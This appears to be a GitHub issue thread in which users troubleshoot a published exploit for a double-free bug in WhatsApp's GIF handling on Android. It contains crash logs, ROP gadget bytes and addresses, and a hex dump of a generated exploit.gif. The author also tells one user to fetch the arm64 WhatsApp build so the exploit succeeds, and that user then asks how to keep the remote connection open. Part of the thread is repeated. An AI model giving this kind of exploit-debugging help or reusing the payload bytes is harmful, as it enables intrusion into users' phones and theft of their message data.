awakened1712
commented
4 years ago The apk generates gif files that trigger writing test.txt to /sdcard
Probably it succeeded, you can check the sdcard to see if test.txt is there
Closed Ychiel closed 4 years ago
awakened1712
commented
4 years ago The apk generates gif files that trigger writing test.txt to /sdcard
Probably it succeeded, you can check the sdcard to see if test.txt is there
Ychiel
commented
4 years ago There is no test.txt file. I see just exploit.gif file...
awakened1712
commented
4 years ago From the log, apparently the exploit was able to hit the gadget found in libhwui.so. Check if WhatsApp has write to sdcard permission.
Ychiel
commented
4 years ago Yes, WhatsApp have full permissions (Camera,Contacts, location,Microphone,Phone,SMS and Storage) What else?
jpclaudino
commented
4 years ago Hi, I have android 9 with Whatsapp 2.19.203. I found the gadget and the system with your android apk that you publish. When I'm enter the Whatsapp gallery after I sent the gif file as document the app was crashed.
Do You have any idea why? Logs:
12-09 14:08:28.563 27111 27111 F DEBUG : 12-09 14:08:28.563 27111 27111 F DEBUG : Build fingerprint: 'samsung/beyond1ltexx/beyond1:9/PPR1.180610.011/G973FXXS3ASJG:user/release-keys' 12-09 14:08:28.564 27111 27111 F DEBUG : Revision: '26' 12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm' 12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<< 12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr -------- 12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated' 12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008 12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c 12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00 12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe 12-09 14:08:28.755 27111 27111 F DEBUG : 12-09 14:08:28.755 27111 27111 F DEBUG : backtrace: 12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58) 12-09 14:08:28.755 27111 27111 F DEBUG : #1 pc 0007e5f9 /system/lib/libc.so (ifree+880) 12-09 14:08:28.756 27111 27111 F DEBUG : #2 pc 0007e717 /system/lib/libc.so (je_free+70) 12-09 14:08:28.756 27111 27111 F DEBUG : #3 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30) 12-09 14:08:28.756 27111 27111 F DEBUG : #4 pc 00382f05 /system/lib/libhwui.so (SkBitmapDevice::~SkBitmapDevice()+16) 12-09 14:08:28.756 27111 27111 F DEBUG : #5 pc 0035684f /system/lib/libhwui.so (SkCanvas::internalRestore()+538) 12-09 14:08:28.756 27111 27111 F DEBUG : #6 pc 00358a6d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+28) 12-09 14:08:28.756 27111 27111 F DEBUG : #07 pc 000d732d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+2) 12-09 14:08:28.756 27111 27111 F DEBUG : #08 pc 00380b1d /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+92) 12-09 14:08:28.756 27111 27111 F DEBUG : #09 pc 000d3363 /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+2) 12-09 14:08:28.756 27111 27111 F DEBUG : #10 pc 000794a9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.math.NativeBN.BN_copy [DEDUPED]+120) 12-09 14:08:28.756 27111 27111 F DEBUG : #11 pc 0010ddff /system/framework/arm/boot-core-libart.oat (offset 0x77000) (libcore.util.NativeAllocationRegistry$CleanerThunk.run+86) 12-09 14:08:28.756 27111 27111 F DEBUG : #12 pc 0030af63 /system/framework/arm/boot.oat (offset 0x10d000) (sun.misc.Cleaner.clean+90) 12-09 14:08:28.756 27111 27111 F DEBUG : #13 pc 0016ea31 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueueLocked+168) 12-09 14:08:28.756 27111 27111 F DEBUG : #14 pc 0016eb1d /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueuePending+148) 12-09 14:08:28.756 27111 27111 F DEBUG : #15 pc 0014bcb9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$ReferenceQueueDaemon.runInternal+232) 12-09 14:08:28.756 27111 27111 F DEBUG : #16 pc 000ef64b /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$Daemon.run+66) 12-09 14:08:28.756 27111 27111 F DEBUG : #17 pc 00219669 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.Thread.run+64) 12-09 14:08:28.756 27111 27111 F DEBUG : #18 pc 00411375 /system/lib/libart.so (art_quick_invoke_stub_internal+68) 12-09 14:08:28.756 27111 27111 F DEBUG : #19 pc 003ea469 /system/lib/libart.so (art_quick_invoke_stub+224) 12-09 14:08:28.756 27111 27111 F DEBUG : #20 pc 000a1615 /system/lib/libart.so (art::ArtMethod::Invoke(art::Thread, unsigned int, unsigned int, art::JValue, char const)+136) 12-09 14:08:28.756 27111 27111 F DEBUG : #21 pc 0034b0b5 /system/lib/libart.so (art::(anonymous namespace)::InvokeWithArgArray(art::ScopedObjectAccessAlreadyRunnable const&, art::ArtMethod, art::(anonymous namespace)::ArgArray, art::JValue, char const)+52) 12-09 14:08:28.756 27111 27111 F DEBUG : #22 pc 0034be0d /system/lib/libart.so (art::InvokeVirtualOrInterfaceWithJValues(art::ScopedObjectAccessAlreadyRunnable const&, _jobject, _jmethodID, jvalue)+320) 12-09 14:08:28.756 27111 27111 F DEBUG : #23 pc 0036d1f3 /system/lib/libart.so (art::Thread::CreateCallback(void)+866) 12-09 14:08:28.756 27111 27111 F DEBUG : #24 pc 00064939 /system/lib/libc.so (__pthread_start(void*)+140) 12-09 14:08:28.757 27111 27111 F DEBUG : #25 pc 0001e3c5 /system/lib/libc.so (__start_thread+24)
Are you sure you found the system and gadget location? By the log, the Android is 32 bits. The double free occurs normally. But the gadget should not be found. The register and the adresses are different.
Ychiel
commented
4 years ago I used your APK to find the values for the System and Gadget. Attached the logcat from the APK: 2-17 20:58:41.032 14168 14168 D InputTransport: Input channel destroyed: fd=72 12-17 20:58:43.222 14168 14168 D ViewRootImpl@fe417cb[MainActivity]: ViewPostIme pointer 0 12-17 20:58:43.292 14168 14168 D ViewRootImpl@fe417cb[MainActivity]: ViewPostIme pointer 1 12-17 20:58:43.467 14168 14168 E libgif : gadget = 68 0E 40 F9 60 82 00 91 00 01 3F D6 size = 12 found in 12-17 20:58:43.467 14168 14168 E libgif : 731b3cb000-731bb79000 r-xp 00000000 fd:00 3812 /system/lib64/libhwui.so 12-17 20:58:43.467 14168 14168 E libgif : g1_loc = 0x731b4c3444 12-17 20:58:43.467 14168 14168 E libgif : system_loc = 0x731cab3e08 12-17 20:58:43.467 14168 14168 E libgif : == genLine_0 complete == 12-17 20:58:43.468 14168 14168 E libgif : buffer = 0x7fe0b318b0 size = 266 12-17 20:58:43.468 14168 14168 E libgif : 47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC 12-17 20:58:43.468 14168 14168 E libgif : FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08 12-17 20:58:43.468 14168 14168 E libgif : 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 08 7C AC E2 12-17 20:58:43.468 14168 14168 E libgif : 30 07 00 00 00 74 DE D4 19 83 06 C4 8B 39 64 C6 12-17 20:58:43.468 14168 14168 E libgif : 84 91 43 E6 05 9D 32 73 E8 B8 A0 83 87 0E 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 44 68 30 D9 30 07 00 00 00 EE FF FF 2C 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12-17 20:58:43.468 14168 14168 E libgif : 00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00 12-17 20:58:43.468 14168 14168 E libgif : 18 00 0A 00 0F 00 01 00 00 3B 12-17 20:58:43.501 14168 14182 I ExternalStorage: Scanned /storage/emulated/0/exploit.gif -> uri = content://media/external/images/media/96
Is that the right results?
jpclaudino
commented
4 years ago Try the following command: adb shell getprop | grep eabi
if you see something like this, you´re on a 32-bit architecture.
ro.product.cpu.abi]: [armeabi-v7a] ro.product.cpu.abi2]: [armeabi] ro.product.cpu.abilist]: [armeabi-v7a,armeabi] ro.product.cpu.abilist32]: [armeabi-v7a,armeabi] ro.vendor.product.cpu.abilist]: [armeabi-v7a,armeabi] ro.vendor.product.cpu.abilist32]: [armeabi-v7a,armeabi]
Ychiel
commented
4 years ago This is the result: beyond1:/ $ getprop | grep eabi
jpclaudino
commented
4 years ago 64-bit architecture. Strange, it may be the version of WhatsApp installed.
These registers and library calls indicate 32-bit libs usage. . 12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008 12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c 12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00 12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe 12-09 14:08:28.755 27111 27111 F DEBUG : 12-09 14:08:28.755 27111 27111 F DEBUG : backtrace: 12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58)
Ychiel
commented
4 years ago I think that the hardware is 64bit but the android OS is 32 bit.
awakened1712
commented
4 years ago I see, you probably got the 32-bit WhatsApp running on the 64-bit Android device. Then you you probably wanna go to apkmirror to find the arm64 version.
I suggest this https://www.apkmirror.com/apk/whatsapp-inc/whatsapp/whatsapp-2-19-216-release/whatsapp-messenger-2-19-216-3-android-apk-download/
Ychiel
commented
4 years ago Thanks, now it's working... But the connection to the remote server closed immediately. How can i keep the connection open?
awakened1712
commented
4 years ago Nice. Why do you need to keep it open? I don't mind sharing but I'm afraid script kiddies will misuse it to do hacking in real life.
Ychiel
commented
4 years ago I want to create a demo and show access to whatsapp data. To explain to our employees that the information in Whatsapp can leak even that communication between devices is encrypted. ??
Hi, I have android 9 with Whatsapp 2.19.203. I found the gadget and the system with your android apk that you publish. When I'm enter the Whatsapp gallery after I sent the gif file as document the app was crashed.
Do You have any idea why? Logs:
12-09 14:08:28.563 27111 27111 F DEBUG : 12-09 14:08:28.563 27111 27111 F DEBUG : Build fingerprint: 'samsung/beyond1ltexx/beyond1:9/PPR1.180610.011/G973FXXS3ASJG:user/release-keys' 12-09 14:08:28.564 27111 27111 F DEBUG : Revision: '26' 12-09 14:08:28.564 27111 27111 F DEBUG : ABI: 'arm' 12-09 14:08:28.564 27111 27111 F DEBUG : pid: 26898, tid: 26911, name: ReferenceQueueD >>> com.whatsapp <<< 12-09 14:08:28.564 27111 27111 F DEBUG : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr -------- 12-09 14:08:28.564 27111 27111 F DEBUG : Abort message: 'Invalid address 0xffcccc66 passed to free: value not allocated' 12-09 14:08:28.564 27111 27111 F DEBUG : r0 00000000 r1 0000691f r2 00000006 r3 00000008 12-09 14:08:28.564 27111 27111 F DEBUG : r4 00006912 r5 0000691f r6 cae103d4 r7 0000010c 12-09 14:08:28.564 27111 27111 F DEBUG : r8 e4d13808 r9 c0f43c28 r10 70b41170 r11 c0f42c00 12-09 14:08:28.564 27111 27111 F DEBUG : ip cae10370 sp cae103c0 lr e7069f01 pc e7060efe 12-09 14:08:28.755 27111 27111 F DEBUG : 12-09 14:08:28.755 27111 27111 F DEBUG : backtrace: 12-09 14:08:28.755 27111 27111 F DEBUG : #00 pc 0001cefe /system/lib/libc.so (abort+58) 12-09 14:08:28.755 27111 27111 F DEBUG : #01 pc 0007e5f9 /system/lib/libc.so (ifree+880) 12-09 14:08:28.756 27111 27111 F DEBUG : #02 pc 0007e717 /system/lib/libc.so (je_free+70) 12-09 14:08:28.756 27111 27111 F DEBUG : #03 pc 0035aa7f /system/lib/libhwui.so (SkDeque::~SkDeque()+30) 12-09 14:08:28.756 27111 27111 F DEBUG : #04 pc 00382f05 /system/lib/libhwui.so (SkBitmapDevice::~SkBitmapDevice()+16) 12-09 14:08:28.756 27111 27111 F DEBUG : #05 pc 0035684f /system/lib/libhwui.so (SkCanvas::internalRestore()+538) 12-09 14:08:28.756 27111 27111 F DEBUG : #06 pc 00358a6d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+28) 12-09 14:08:28.756 27111 27111 F DEBUG : #07 pc 000d732d /system/lib/libhwui.so (SkCanvas::~SkCanvas()+2) 12-09 14:08:28.756 27111 27111 F DEBUG : #08 pc 00380b1d /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+92) 12-09 14:08:28.756 27111 27111 F DEBUG : #09 pc 000d3363 /system/lib/libhwui.so (android::SkiaCanvas::~SkiaCanvas()+2) 12-09 14:08:28.756 27111 27111 F DEBUG : #10 pc 000794a9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.math.NativeBN.BN_copy [DEDUPED]+120) 12-09 14:08:28.756 27111 27111 F DEBUG : #11 pc 0010ddff /system/framework/arm/boot-core-libart.oat (offset 0x77000) (libcore.util.NativeAllocationRegistry$CleanerThunk.run+86) 12-09 14:08:28.756 27111 27111 F DEBUG : #12 pc 0030af63 /system/framework/arm/boot.oat (offset 0x10d000) (sun.misc.Cleaner.clean+90) 12-09 14:08:28.756 27111 27111 F DEBUG : #13 pc 0016ea31 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueueLocked+168) 12-09 14:08:28.756 27111 27111 F DEBUG : #14 pc 0016eb1d /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.ref.ReferenceQueue.enqueuePending+148) 12-09 14:08:28.756 27111 27111 F DEBUG : #15 pc 0014bcb9 /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$ReferenceQueueDaemon.runInternal+232) 12-09 14:08:28.756 27111 27111 F DEBUG : #16 pc 000ef64b /system/framework/arm/boot-core-libart.oat (offset 0x77000) (java.lang.Daemons$Daemon.run+66) 12-09 14:08:28.756 27111 27111 F DEBUG : #17 pc 00219669 /system/framework/arm/boot.oat (offset 0x10d000) (java.lang.Thread.run+64) 12-09 14:08:28.756 27111 27111 F DEBUG : #18 pc 00411375 /system/lib/libart.so (art_quick_invoke_stub_internal+68) 12-09 14:08:28.756 27111 27111 F DEBUG : #19 pc 003ea469 /system/lib/libart.so (art_quick_invoke_stub+224) 12-09 14:08:28.756 27111 27111 F DEBUG : #20 pc 000a1615 /system/lib/libart.so (art::ArtMethod::Invoke(art::Thread, unsigned int, unsigned int, art::JValue, char const)+136) 12-09 14:08:28.756 27111 27111 F DEBUG : #21 pc 0034b0b5 /system/lib/libart.so (art::(anonymous namespace)::InvokeWithArgArray(art::ScopedObjectAccessAlreadyRunnable const&, art::ArtMethod, art::(anonymous namespace)::ArgArray, art::JValue, char const)+52) 12-09 14:08:28.756 27111 27111 F DEBUG : #22 pc 0034be0d /system/lib/libart.so (art::InvokeVirtualOrInterfaceWithJValues(art::ScopedObjectAccessAlreadyRunnable const&, _jobject, _jmethodID, jvalue)+320) 12-09 14:08:28.756 27111 27111 F DEBUG : #23 pc 0036d1f3 /system/lib/libart.so (art::Thread::CreateCallback(void)+866) 12-09 14:08:28.756 27111 27111 F DEBUG : #24 pc 00064939 /system/lib/libc.so (__pthread_start(void*)+140) 12-09 14:08:28.757 27111 27111 F DEBUG : #25 pc 0001e3c5 /system/lib/libc.so (__start_thread+24)